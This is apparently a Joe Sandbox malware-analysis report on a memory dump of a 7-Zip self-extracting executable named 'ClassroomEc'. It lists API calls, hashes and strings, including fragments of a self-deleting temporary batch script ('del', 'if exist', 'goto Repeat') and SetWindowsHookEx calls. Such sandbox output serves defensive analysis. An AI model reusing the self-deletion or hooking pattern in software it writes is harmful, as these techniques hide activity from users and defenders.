Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 68d04c9b79b621abe1b1555c2193feb214f9517246706198fa3181732c31d353
Instruction ID: 6de26c61aa5a6329f4525358998cc84c5a14f96d8095d39cf791194d69b125c4
Opcode Fuzzy Hash: 68d04c9b79b621abe1b1555c2193feb214f9517246706198fa3181732c31d353
Instruction Fuzzy Hash: BF0152B2E40209ABDF04EFA4DD467AE77B4AF00340F01C468E80EAB292DB755B45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A88FF0 Relevance: 1.3, APIs: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00A89019

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
Instruction ID: ef8ae37a1d3508cde668f2b70f432a7f407fb8718adc2b8154ad813a00a71e9f
Opcode Fuzzy Hash: 1dd495598ebddd9998bd3669da28e97c01af639729b23818e2c0219baa4f5057
Instruction Fuzzy Hash: 0DF0FEB5A05208AFCB08DF58D541A5DFFF4EF48350F1081A9EC499B345D631EE51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A76500 Relevance: 1.3, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00A7650B

Part of subcall function 00A765A0: _DebugHeapAllocator.LIBCPMTD ref: 00A765AE
Part of subcall function 00A765A0: _DebugHeapAllocator.LIBCPMTD ref: 00A765C0

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$??2@
String ID:
API String ID: 1120120259-0
Opcode ID: 939666753f753fe99277cc5e9726e4c1763854a6552f2298c94dd3625c1625ef
Instruction ID: c9c827439e2fcf87357aaca86593a331fd1c05be820a18a18df979e139763450
Opcode Fuzzy Hash: 939666753f753fe99277cc5e9726e4c1763854a6552f2298c94dd3625c1625ef
Instruction Fuzzy Hash: 5FE0C9F1D14608AFDF04EFA4D946B9EBBB4AB44300F50C1A9E5056B280EA705A54EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A84240 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00A8425C

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
Instruction ID: 8961e9e15d7f9007722a44dc605c943d2cf79bbe2ecfaa07c91fcfa463026592
Opcode Fuzzy Hash: 917d4162340fb44f94f007ac9e731a54d4517bc9d05544b15a4b49cae7dede00
Instruction Fuzzy Hash: 42E01AB4D04208EFCB00DF98D441A8DBBF4AB18300F1041A5E808A7340E230AA94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A847E0 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 00A847FA

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 938e7327eb311c2541f3a6d835b598872e222a7a64c9911f363a4f531d18fcd4
Instruction ID: d95c4f68a305278e490706f0a2e870eacb1070560d838b5363e1ae3094c60d88
Opcode Fuzzy Hash: 938e7327eb311c2541f3a6d835b598872e222a7a64c9911f363a4f531d18fcd4
Instruction Fuzzy Hash: 77D0123064420ABAE700AA94EC45BA63698970CB95F104020FB0D890C0D6B0959047A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A84810 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84826

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5a2f6de4d853c62dd1f380824a8ec425825ad634c4143b6530dc9ca752649419
Instruction ID: 67c8db1908eb4f9605b6a217e7020487fb95d5d0f6e5938af5da603f2f1d4143
Opcode Fuzzy Hash: 5a2f6de4d853c62dd1f380824a8ec425825ad634c4143b6530dc9ca752649419
Instruction Fuzzy Hash: 68C0803054070DFBDB10ABD4DC45BE6375C9718711F108011FA4D59080C6709584C7D0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A7B300 Relevance: 16.6, APIs: 11, Instructions: 106stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,?,?), ref: 00A7B32D
GetLastError.KERNEL32 ref: 00A7B33D
FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
lstrcpyW.KERNEL32(?,?), ref: 00A7B404
lstrcpyW.KERNEL32(?,?), ref: 00A7B437
??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
LocalFree.KERNEL32(?), ref: 00A7B46E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: f6b1a855b850130b39b04fc33bd8fe745b7464a9f04c9d6cf27f5a54f1c389c7
Instruction ID: 8dca0c594ecd5419a6aa91075661336f564e058e3ba13609e5d4a2e0632f5431
Opcode Fuzzy Hash: f6b1a855b850130b39b04fc33bd8fe745b7464a9f04c9d6cf27f5a54f1c389c7
Instruction Fuzzy Hash: 9A41FDB5A0021CABDB64DF94DC45BDAB7B8FF48300F10C1A9E54996251DF349A86CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79FC0 Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00A79FE0
SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00A79FFF
GetDC.USER32(00000000), ref: 00A7A00B
GetDeviceCaps.GDI32(?,0000005A), ref: 00A7A020
MulDiv.KERNEL32(?,00000048,00000000), ref: 00A7A030
ReleaseDC.USER32(00000000,?), ref: 00A7A047
GetModuleHandleW.KERNEL32(00000000), ref: 00A7A077
FindResourceA.KERNEL32(?,00000000,00000005), ref: 00A7A0AD
LoadResource.KERNEL32(?,00000000), ref: 00A7A0D0
LockResource.KERNEL32(00000000), ref: 00A7A0EC
DialogBoxIndirectParamW.USER32(?,00000000,?,Function_00008D70,?), ref: 00A7A138

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Resource$CapsDeviceDialogFindHandleIndirectInfoLoadLockModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 3119308957-0
Opcode ID: 9520225625ecf48b5fb5f48a0398b07e7719a645dcea2c833d2de2aa4e05bf0e
Instruction ID: 3a97b1513a9ceb41c578ae0e559920d05feae468e022b8fcc45f285d8130623d
Opcode Fuzzy Hash: 9520225625ecf48b5fb5f48a0398b07e7719a645dcea2c833d2de2aa4e05bf0e
Instruction Fuzzy Hash: 964129B4A04228AFDB62CF64CC49BEAB7B8BB48701F0481CDE51DA6290DB715F85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A75200 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 413memoryCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT(?), ref: 00A75223
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00A75352
_DebugHeapAllocator.LIBCPMTD ref: 00A7536D

Strings

.lnk, xrefs: 00A7562D

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugFolderHeapPathSpecial_wtol
String ID: .lnk
API String ID: 3713458237-24824748
Opcode ID: 659fef4a57c0f2adbb9a0b44d06875e98c983472a5fad5bc948845264de74788
Instruction ID: 60d3ea488866c7fe805397530142deba82d18184b739e60d453943afdcd7bea5
Opcode Fuzzy Hash: 659fef4a57c0f2adbb9a0b44d06875e98c983472a5fad5bc948845264de74788
Instruction Fuzzy Hash: 14025A719105199BCB14EF64DD95BEDB7B8AF18304F50C199E00EAA1A1EF70AE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A79F30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,?,000004B2,?), ref: 00A79F3E
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00A79F56
GetWindow.USER32(00000000,00000005), ref: 00A79F70
GetWindow.USER32(00000000,00000002), ref: 00A79F96

Strings

SetWindowTheme, xrefs: 00A79F4D
uxtheme, xrefs: 00A79F39

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$uxtheme
API String ID: 324724604-1369271589
Opcode ID: ef22abbf561d6cac76898fb9c8a25214bdb6e139ea677f82e50782bff14b54f9
Instruction ID: 3d6449555986515905a6c90264bc8b39605403e12a6f4e05f1befa0aaa2a616d
Opcode Fuzzy Hash: ef22abbf561d6cac76898fb9c8a25214bdb6e139ea677f82e50782bff14b54f9
Instruction Fuzzy Hash: 7C01C874E40218BFEB00AFE8D84EB9EBBB4FB08705F10C99AE515A6290DA755A40CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00A78CD0 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A78CEF
SetWindowsHookExW.USER32(00000007,Function_00008A80,00000000,00000000), ref: 00A78CFF

Part of subcall function 00A78990: _DebugHeapAllocator.LIBCPMTD ref: 00A789AF
Part of subcall function 00A78990: wsprintfW.USER32 ref: 00A789E1

GetCurrentThreadId.KERNEL32 ref: 00A78D13
SetWindowsHookExW.USER32(00000002,Function_00008B60,00000000,00000000), ref: 00A78D23

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: CurrentHookThreadWindows$AllocatorDebugHeapwsprintf
String ID:
API String ID: 3455760282-0
Opcode ID: 56e242688be4f9e4221363776a6b87f1a5ad9dae14d3cf66722ffa8a0b8cc8ec
Instruction ID: fe190a1a973247b4cfcd48ab23e31cc3064d518c1ba60850e3c452d2d32ba19d
Opcode Fuzzy Hash: 56e242688be4f9e4221363776a6b87f1a5ad9dae14d3cf66722ffa8a0b8cc8ec
Instruction Fuzzy Hash: D9117974A40208EFDB10DFA8ED89B69B7B0BB44304F11C05AE609562A2DF752D82CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00A97CD5 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00027C92), ref: 00A97CDA

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 92fb9a896396cf35278b6e5aa02cde644ab0d9c8f8fe13ea0582d052343650be
Instruction ID: 07ddcac25a34189869f899b158ce0fd12b325a7b4e9ea165c7bd18aac272f774
Opcode Fuzzy Hash: 92fb9a896396cf35278b6e5aa02cde644ab0d9c8f8fe13ea0582d052343650be
Instruction Fuzzy Hash: 84900264365101668E9457B45C0E80E65E87B49702F5189596441C4054DE6140015521

Uniqueness

Uniqueness Score: -1.00%

Function 00A86210 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
Instruction ID: 6c26674a386588894a65653882a427808ea8405668eeb7e571557daf3fb138df
Opcode Fuzzy Hash: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
Instruction Fuzzy Hash: 14F067B5A04209DF8B09CF99D48189EFBF5FF49310B1081A9EC1997350D731AA51CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A76DC0 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 185memorystringCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A76DE7

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

lstrcmpiW.KERNEL32(00000000,00A9A398), ref: 00A76E7B
_wtol.MSVCRT(00000000), ref: 00A76FA4
_wtol.MSVCRT(00000000), ref: 00A76FCE

Strings

ExtractCancelText, xrefs: 00A76F62
ErrorTitle, xrefs: 00A76E1B
ExtractPathText, xrefs: 00A76FFF
CancelPrompt, xrefs: 00A7701F
ExtractDialogWidth, xrefs: 00A76F8A
MiscFlags, xrefs: 00A76F33
GUIFlags, xrefs: 00A76EFB
ExtractPathWidth, xrefs: 00A76FB4
ExtractTitle, xrefs: 00A76E3C
OverwriteMode, xrefs: 00A76ECE
GUIMode, xrefs: 00A76E91
Progress, xrefs: 00A76E5C
ExtractDialogText, xrefs: 00A76F76
ExtractPathTitle, xrefs: 00A76FDE
Title, xrefs: 00A76DC8

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: _wtol$AllocatorDebugHeap_wmemmovelstrcmpi
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title
API String ID: 1673552667-694992937
Opcode ID: c49252f86dcbc6f9352dd06debc0c78c736cb4f822b2c27b2baafb7f19504cd2
Instruction ID: d296ff2d672a7caf239532458c286f18eef03fc35cd0aad328c6de91a4576d74
Opcode Fuzzy Hash: c49252f86dcbc6f9352dd06debc0c78c736cb4f822b2c27b2baafb7f19504cd2
Instruction Fuzzy Hash: BC716FB4E41204FBEB01EFA8FE0A7AD7BB0AB44705F24C469E40967291E7711F45DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A793F0 Relevance: 27.3, APIs: 18, Instructions: 255windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A79410
LoadIconW.USER32(00000000), ref: 00A79417
GetSystemMetrics.USER32(00000032), ref: 00A79424
GetSystemMetrics.USER32(00000031), ref: 00A7942D
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00A7943A
LoadImageW.USER32(00000000), ref: 00A79441
GetWindowLongW.USER32(00000000,000004B2), ref: 00A7949A
SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00A794B6
GetWindowLongW.USER32(00000000,000004B5), ref: 00A794CC
SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A794E8
GetWindow.USER32(?,00000005), ref: 00A79607
GetWindow.USER32(00000000,00000002), ref: 00A79628

Part of subcall function 00A79A30: GetWindowTextLengthW.USER32(00000000), ref: 00A79A44

GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A7968C
LoadIconW.USER32(00000000), ref: 00A79693
LoadIconW.USER32(00000000,00007F02), ref: 00A796A5
LoadIconW.USER32(00000000,00007F01), ref: 00A796B7
LoadIconW.USER32(00000000,00007F04), ref: 00A796C9
SendMessageW.USER32(00000000,000004B1,00000172,00000001), ref: 00A796FB

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Window$Load$Icon$Long$HandleModule$MetricsSystem$ImageLengthMessageSendText
String ID:
API String ID: 1276301936-0
Opcode ID: ba35b8338bd8574f6f3c45e60fc994dbb6088b746bdd5ed7ec67577df04dd9f4
Instruction ID: c3d5b75c278cc9d9966a2c72792b46d1d8a98439675df83ef39fe3b2cbfd9bfb
Opcode Fuzzy Hash: ba35b8338bd8574f6f3c45e60fc994dbb6088b746bdd5ed7ec67577df04dd9f4
Instruction Fuzzy Hash: 9DA11C70A40205AFEB04DBA4DE5ABAF7775BB44701F20C12AF60A7B2D1CB746E41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A78570 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 159filememoryCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(00A78375,?,?,?,?,?,?,?,?,?,?,?,?,00A78375,00A9D4FC), ref: 00A785D4
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00A78627
_DebugHeapAllocator.LIBCPMTD ref: 00A7864A
WriteFile.KERNEL32(000000FF,00000000,00A78375,del ",:Repeat), ref: 00A786EE
CloseHandle.KERNEL32(000000FF), ref: 00A78703
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00A78752
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00A7876E

Strings

", xrefs: 00A78668, 00A786B4
" goto Repeat, xrefs: 00A7868E
del ", xrefs: 00A7864F, 00A7869B
open, xrefs: 00A78767
if exist ", xrefs: 00A78675
7ZSfx%03x.cmd, xrefs: 00A785FB
:Repeat, xrefs: 00A78642

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: File$AllocatorAttributesCloseCreateDebugDriveExecuteHandleHeapShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3581052426-3467708659
Opcode ID: 3ebf2dae107b41b4ceace0998bd8b3973bd8bd06a6252ec5a913843cabb7c5d5
Instruction ID: db53fb5595909de3b92498bd1f7849d43cc343735c3f815af7c3370385f7d4f3
Opcode Fuzzy Hash: 3ebf2dae107b41b4ceace0998bd8b3973bd8bd06a6252ec5a913843cabb7c5d5
Instruction Fuzzy Hash: AA515471A40208AACB04FBA4DD57BEE7774AF24300F50C469F50A760E2EF756E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A70 Relevance: 19.9, APIs: 13, Instructions: 354COMMON

Download Yara Rule

APIs

Part of subcall function 00A78A60: GetDlgItem.USER32(?,00000000), ref: 00A78A72

GetWindowLongW.USER32(00000000,000004B3), ref: 00A79AA3
GetWindowLongW.USER32(00000000,000004B4), ref: 00A79AEA
GetSystemMetrics.USER32(00000010), ref: 00A79BA6
GetSystemMetrics.USER32(00000011), ref: 00A79BB1
GetSystemMetrics.USER32(00000008), ref: 00A79BBC
GetSystemMetrics.USER32(00000007), ref: 00A79BD0
GetParent.USER32(00000000), ref: 00A79C0F
ClientToScreen.USER32(00000000,?), ref: 00A79C38
ClientToScreen.USER32(00000000,?), ref: 00A79C46
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00A79CD7

Part of subcall function 00A799F0: SetWindowPos.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,00A79F21,?,?,?,?,?), ref: 00A79A1D

GetClientRect.USER32(00000000,?), ref: 00A79C2A

Part of subcall function 00A797C0: GetDlgItem.USER32(00000000,?), ref: 00A797D8

GetSystemMetrics.USER32(00000008), ref: 00A79E53
GetSystemMetrics.USER32(00000007), ref: 00A79E69

Part of subcall function 00A78B40: GetClientRect.USER32(00000000,?), ref: 00A78B54

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: MetricsSystem$ClientWindow$ItemLongRectScreen$Parent
String ID:
API String ID: 3176548655-0
Opcode ID: b91e02b8ef41da04909c88aade994b9e0b61dba7c52fbbec2575f125b76ea533
